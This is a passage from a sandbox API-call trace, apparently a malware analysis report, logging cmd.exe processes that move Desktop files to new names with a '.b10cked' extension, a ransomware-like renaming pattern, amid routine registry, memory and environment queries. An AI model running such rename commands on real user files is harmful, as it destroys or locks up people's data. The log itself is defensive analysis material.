(_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.678] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.678] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.678] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.678] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.678] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.678] _wcsicmp (_String1="DDLQZM~1.PNG", 
_String2=".") returned 54 [0220.678] _wcsicmp (_String1="DDLQZM~1.PNG", _String2="..") returned 54 [0220.678] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm~1.png")) returned 0x20 [0220.678] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x411d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.678] SetErrorMode (uMode=0x0) returned 0x0 [0220.678] SetErrorMode (uMode=0x1) returned 0x0 [0220.678] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG", nBufferLength=0x104, lpBuffer=0x2ef1a4, lpFilePart=0x2ef18c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG", lpFilePart=0x2ef18c*="DDLQZM~1.PNG") returned 0x25 [0220.678] SetErrorMode (uMode=0x0) returned 0x1 [0220.678] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.679] _wcsicmp (_String1="DDLQZM~1.PNG", _String2=".") returned 54 [0220.679] _wcsicmp (_String1="DDLQZM~1.PNG", _String2="..") returned 54 [0220.679] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm~1.png")) returned 0x20 [0220.679] SetErrorMode (uMode=0x0) returned 0x0 [0220.679] SetErrorMode (uMode=0x1) returned 0x0 [0220.679] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG", nBufferLength=0x104, lpBuffer=0x2ef620, lpFilePart=0x2ef3b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG", lpFilePart=0x2ef3b8*="DDLQZM~1.PNG") returned 0x25 [0220.679] SetErrorMode (uMode=0x0) returned 0x1 [0220.679] SetErrorMode (uMode=0x0) returned 0x0 [0220.679] SetErrorMode (uMode=0x1) returned 0x0 [0220.679] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked", nBufferLength=0x104, lpBuffer=0x2ef828, lpFilePart=0x2ef3b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked", 
lpFilePart=0x2ef3b8*="DDlQzm1zrUmfqtdJ.png.b10cked") returned 0x35 [0220.679] SetErrorMode (uMode=0x0) returned 0x1 [0220.679] SetLastError (dwErrCode=0x0) [0220.679] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm1zrumfqtdj.png.b10cked")) returned 0xffffffff [0220.679] GetLastError () returned 0x2 [0220.679] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x2eed34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eed34) returned 0x400f20 [0220.680] FindNextFileW (in: hFindFile=0x400f20, lpFindFileData=0x2eed34 | out: lpFindFileData=0x2eed34) returned 0 [0220.680] GetLastError () returned 0x12 [0220.680] FindClose (in: hFindFile=0x400f20 | out: hFindFile=0x400f20) returned 1 [0220.681] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x411af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x411af0) returned 0x400f20 [0220.681] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked", nBufferLength=0x104, lpBuffer=0x2eefcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked", lpFilePart=0x0) returned 0x35 [0220.681] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png", nBufferLength=0x104, lpBuffer=0x2eefcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png", lpFilePart=0x0) returned 0x2d [0220.681] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm1zrumfqtdj.png")) returned 0x20 [0220.681] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm1zrumfqtdj.png"), 
lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm1zrumfqtdj.png.b10cked"), dwFlags=0x3) returned 1 [0220.682] FindClose (in: hFindFile=0x400f20 | out: hFindFile=0x400f20) returned 1 [0220.683] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eef80 | out: _Buffer=" 1") returned 9 [0220.683] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.683] GetFileType (hFile=0x7) returned 0x2 [0222.925] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.925] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef0c | out: lpMode=0x2eef0c) returned 1 [0222.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.925] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eef40 | out: lpConsoleScreenBufferInfo=0x2eef40) returned 1 [0222.925] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.926] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x2eef80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.926] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eef64, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x2eef64*=0x1a) returned 1 [0222.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.926] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.927] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.927] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.927] SetConsoleInputExeNameW () returned 0x1 
[0222.927] GetConsoleOutputCP () returned 0x1b5 [0222.927] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.927] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.927] exit (_Code=0) Process: id = "579" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xd54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32954 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32955 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32956 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32957 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 32958 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32959 start_va = 0x77230000 end_va = 
0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32960 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32961 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32962 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 32963 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33104 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33105 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33106 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33107 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 33108 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 33109 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33110 start_va = 0x75540000 end_va = 0x75589fff 
entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33111 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33112 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33113 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33114 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33115 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33116 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33117 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33118 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 33119 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33120 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33121 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 33122 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 33123 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 33124 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 33125 start_va = 0x540000 end_va = 0x640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 33126 start_va = 0x650000 end_va = 0x124ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 33127 start_va = 0x1250000 end_va = 0x13b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Thread: id = 783 os_tid = 0xd28 [0220.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f87c | out: lpSystemTimeAsFileTime=0x18f87c*(dwLowDateTime=0xb84c7480, dwHighDateTime=0x1d440a9)) [0220.623] GetCurrentProcessId () returned 0xd54 [0220.623] GetCurrentThreadId () returned 0xd28 [0220.623] GetTickCount () returned 0x3d90f [0220.623] QueryPerformanceCounter (in: lpPerformanceCount=0x18f874 | out: lpPerformanceCount=0x18f874*=27741234773) returned 1 [0220.624] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.624] __set_app_type (_Type=0x1) [0220.624] __p__fmode () returned 0x76b331f4 
[0220.624] __p__commode () returned 0x76b331fc [0220.624] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.624] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.624] GetCurrentThreadId () returned 0xd28 [0220.624] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd28) returned 0x38 [0220.624] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.624] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.624] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.625] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.625] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f80c | out: phkResult=0x18f80c*=0x0) returned 0x2 [0220.625] VirtualQuery (in: lpAddress=0x18f843, lpBuffer=0x18f7dc, dwLength=0x1c | out: lpBuffer=0x18f7dc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.625] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f7dc, dwLength=0x1c | out: lpBuffer=0x18f7dc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.625] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f7dc, dwLength=0x1c | out: lpBuffer=0x18f7dc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.625] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f7dc, dwLength=0x1c | out: lpBuffer=0x18f7dc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, 
State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.625] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f7dc, dwLength=0x1c | out: lpBuffer=0x18f7dc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.625] GetConsoleOutputCP () returned 0x1b5 [0220.625] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.625] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.625] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.625] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.625] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.625] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.625] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.626] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.626] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.626] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.626] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.626] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.626] GetEnvironmentStringsW () returned 0x2b0198* [0220.626] FreeEnvironmentStringsW (penv=0x2b0198) returned 1 [0220.626] GetEnvironmentStringsW () returned 0x2b0198* [0220.626] FreeEnvironmentStringsW (penv=0x2b0198) returned 1 [0220.626] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e77c | out: phkResult=0x18e77c*=0x40) returned 0x0 [0220.626] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x0, lpData=0x18e788*=0xc0, lpcbData=0x18e780*=0x1000) returned 0x2 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", 
lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x1, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x0, lpData=0x18e788*=0x1, lpcbData=0x18e780*=0x1000) returned 0x2 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x0, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x40, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x40, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x0, lpData=0x18e788*=0x40, lpcbData=0x18e780*=0x1000) returned 0x2 [0220.627] RegCloseKey (hKey=0x40) returned 0x0 [0220.627] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e77c | out: phkResult=0x18e77c*=0x40) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x0, lpData=0x18e788*=0x40, lpcbData=0x18e780*=0x1000) returned 0x2 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, 
lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x1, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x0, lpData=0x18e788*=0x1, lpcbData=0x18e780*=0x1000) returned 0x2 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x0, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x9, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x9, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x0, lpData=0x18e788*=0x9, lpcbData=0x18e780*=0x1000) returned 0x2 [0220.627] RegCloseKey (hKey=0x40) returned 0x0 [0220.627] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.627] srand (_Seed=0x5b8863b6) [0220.627] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked\"" [0220.627] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked\"" [0220.627] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.628] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.628] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.628] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.628] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.628] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.628] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.628] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.628] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.628] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.628] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.628] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.628] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.628] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.628] GetEnvironmentStringsW () returned 0x2b22e8* [0220.628] FreeEnvironmentStringsW (penv=0x2b22e8) returned 1 [0220.628] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.628] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.628] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.628] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.629] 
